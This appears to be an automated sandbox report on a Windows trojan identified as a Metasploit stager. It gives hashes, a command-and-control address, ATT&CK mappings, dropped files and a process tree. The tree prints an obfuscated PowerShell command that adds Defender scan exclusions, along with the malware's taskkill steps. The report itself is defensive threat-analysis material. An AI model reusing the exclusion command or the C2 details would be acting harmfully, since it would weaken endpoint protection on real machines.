metasploit | 00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
18-01-2025 02:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe
Size

6.1MB
MD5

192bcd791eac82426c69c1496d9059e5
SHA1

036019f9b93f2b2cb80fa251fe769203994e0ae2
SHA256

00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9
SHA512

e774a0a47ec7931a1928ac22f54c65089a340e24cb87fd9b59cf64e8ad203e0bd904da997318ff5c9f0aceddce70dfa415bfae053d97db374adff7cbbe03d3e0
SSDEEP

98304:66nonNZnR83jP+0g/7/DXj6Bi/cwIofEbo4P4HwsffoOX1g8:6WATR8zP/gD/DfP7WqfoOq8

Score

10^/10

metasploit backdoor defense_evasion discovery trojan

Malware Config

Extracted

Family

metasploit

Version

metasploit_stager

5.75.234.8:5050

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Executes dropped EXE 5 IoCs

pid	Process
3016	svchost.exe
2164	CRInjector.exe
2392	build.exe
2892	cr.exe
1208	Process not Found

Loads dropped DLL 6 IoCs

pid	Process
2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe
2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe
2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe
2164	CRInjector.exe
2164	CRInjector.exe
2900	Process not Found

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
9	raw.githubusercontent.com
10	raw.githubusercontent.com
11	raw.githubusercontent.com
12	raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CRInjector.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1148	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
752	taskkill.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2932	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	2392	build.exe
Token: SeDebugPrivilege	752	taskkill.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2832 wrote to memory of 2932	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	31
PID 2832 wrote to memory of 2932	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	31
PID 2832 wrote to memory of 2932	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	31
PID 2832 wrote to memory of 2932	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	31
PID 2832 wrote to memory of 3016	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	33
PID 2832 wrote to memory of 3016	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	33
PID 2832 wrote to memory of 3016	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	33
PID 2832 wrote to memory of 3016	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	33
PID 2832 wrote to memory of 2164	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	34
PID 2832 wrote to memory of 2164	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	34
PID 2832 wrote to memory of 2164	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	34
PID 2832 wrote to memory of 2164	2832	00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe	34
PID 2164 wrote to memory of 2392	2164	CRInjector.exe	35
PID 2164 wrote to memory of 2392	2164	CRInjector.exe	35
PID 2164 wrote to memory of 2392	2164	CRInjector.exe	35
PID 2164 wrote to memory of 2392	2164	CRInjector.exe	35
PID 2164 wrote to memory of 2892	2164	CRInjector.exe	36
PID 2164 wrote to memory of 2892	2164	CRInjector.exe	36
PID 2164 wrote to memory of 2892	2164	CRInjector.exe	36
PID 2164 wrote to memory of 2892	2164	CRInjector.exe	36
PID 2392 wrote to memory of 2760	2392	build.exe	39
PID 2392 wrote to memory of 2760	2392	build.exe	39
PID 2392 wrote to memory of 2760	2392	build.exe	39
PID 2760 wrote to memory of 2440	2760	cmd.exe	41
PID 2760 wrote to memory of 2440	2760	cmd.exe	41
PID 2760 wrote to memory of 2440	2760	cmd.exe	41
PID 2760 wrote to memory of 752	2760	cmd.exe	42
PID 2760 wrote to memory of 752	2760	cmd.exe	42
PID 2760 wrote to memory of 752	2760	cmd.exe	42
PID 2760 wrote to memory of 1148	2760	cmd.exe	43
PID 2760 wrote to memory of 1148	2760	cmd.exe	43
PID 2760 wrote to memory of 1148	2760	cmd.exe	43

C:\Users\Admin\AppData\Local\Temp\00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe
"C:\Users\Admin\AppData\Local\Temp\00f0c2f3687ab8bf0990084d1e3af62246005c32084fa598aca1d65bdc0740c9.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2832
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAawByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAdgBnACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2932
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  - Executes dropped EXE
  PID:3016
- C:\Users\Admin\AppData\Local\Temp\CRInjector.exe
  "C:\Users\Admin\AppData\Local\Temp\CRInjector.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Users\Admin\AppData\Local\Temp\build.exe
    "C:\Users\Admin\AppData\Local\Temp\build.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\41dccb8d-27a2-4383-a85f-b5363cc4cde3.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2760
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:2440
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2392
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:752
    - - C:\Windows\system32\timeout.exe
        
        timeout /T 2 /NOBREAK
        5⤵
        Delays execution with timeout.exe
        
        PID:1148
- - C:\Users\Admin\AppData\Local\Temp\cr.exe
    "C:\Users\Admin\AppData\Local\Temp\cr.exe"
    3⤵
    - Executes dropped EXE
    PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\41dccb8d-27a2-4383-a85f-b5363cc4cde3.bat

Filesize
152B

MD5
152daba19587c5e084957c1c8c50c8d3

SHA1
3f5339ff81a0335e34a68b5da147b0c737a92a66

SHA256
9dd6d0f7354bf697820d9029390cda6e1576c02677e22ca4acd2ea19ca63b1a1

SHA512
76f8b1e91b0de98ec00989a69185f6654ef08786dc8c7596e8ba186ca8668b1c7a7058b709b2783a446059161dbfc68284a36cd790aad1055c4446e79d900adf

Download Submit
C:\Users\Admin\AppData\Local\Temp\CRInjector.exe

Filesize
6.1MB

MD5
1d0ddf1ad8614ed2bf87a911d3191880

SHA1
137566648a65e7627ca26e8c6fc5712b4b46a54c

SHA256
e6426e2874c427878a7aa4b1c771f72cfcf4d97da189c7f1c7eba802d412af96

SHA512
d91c1840094ab7cf1686b1df53e55fc7bf45a14da4526f396776d7ac3340c5d6f82cf56464fa87d2f0320a4d060644c463ef3eb110d8ebb355df312a46e25051

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF3E2.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF3F5.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cr.exe

Filesize
23KB

MD5
84132b6ff67a2edc0086641076cbe74c

SHA1
82e5b836b6003635fb2c98a4851789ab093dfd30

SHA256
6061e0a08600cb5beb394bffd3ddfecd1699406f6709c7413962cb3881d845cf

SHA512
5096ffeb7f071a5811dca9a6088a99cdbb52240177094eaf9ecef9be27c84e46f4f56f197c0badd76f38cc79d5cbca68faea64c8060e589eab5d7e1dc7552548

Download Submit
\Users\Admin\AppData\Local\Temp\build.exe

Filesize
6.1MB

MD5
2270f282eea0a6f4f9281a9fa22643e8

SHA1
809c81c4a672704b281cd4a858cac8a10df26207

SHA256
a23477faa272984c38dbf7533dcab6c12395a2a32845910ba1c2cccb6797880d

SHA512
4e9e33d34f51ab7940f686733959ce3b06e1fffe1418bd44be60b1f31762aa2f9eccaa8ec7525d496f0c50160c32252008b74f813ddbc1f4b9bc42c64a22416c

Download Submit
\Users\Admin\AppData\Local\Temp\svchost.exe

Filesize
7KB

MD5
073d78ce1468ecbeedc0afecb126e6cd

SHA1
5ea217f44b9775effac3c44da2d551294923ae9f

SHA256
8bdcaef5756f0e60fdb0fb0c71bff9ff6631b5ad74c3d04614cb09bc83d25c31

SHA512
78ffc25e65100488487411582b3d4d732d50ee17daedc84eb1ada44d12a708eb4cf6eb97c9772f74057ae6cc011b4358c454169d87156cd1295a4748162908e0

Download Submit
memory/2392-31-0x0000000000FE0000-0x00000000015F6000-memory.dmp

Filesize
6.1MB

Download
memory/2832-3-0x0000000000270000-0x0000000000275000-memory.dmp

Filesize
20KB

Download
memory/2832-8-0x0000000000270000-0x0000000000275000-memory.dmp

Filesize
20KB

Download
memory/3016-10-0x0000000140000000-0x0000000140004278-memory.dmp

Filesize
16KB

Download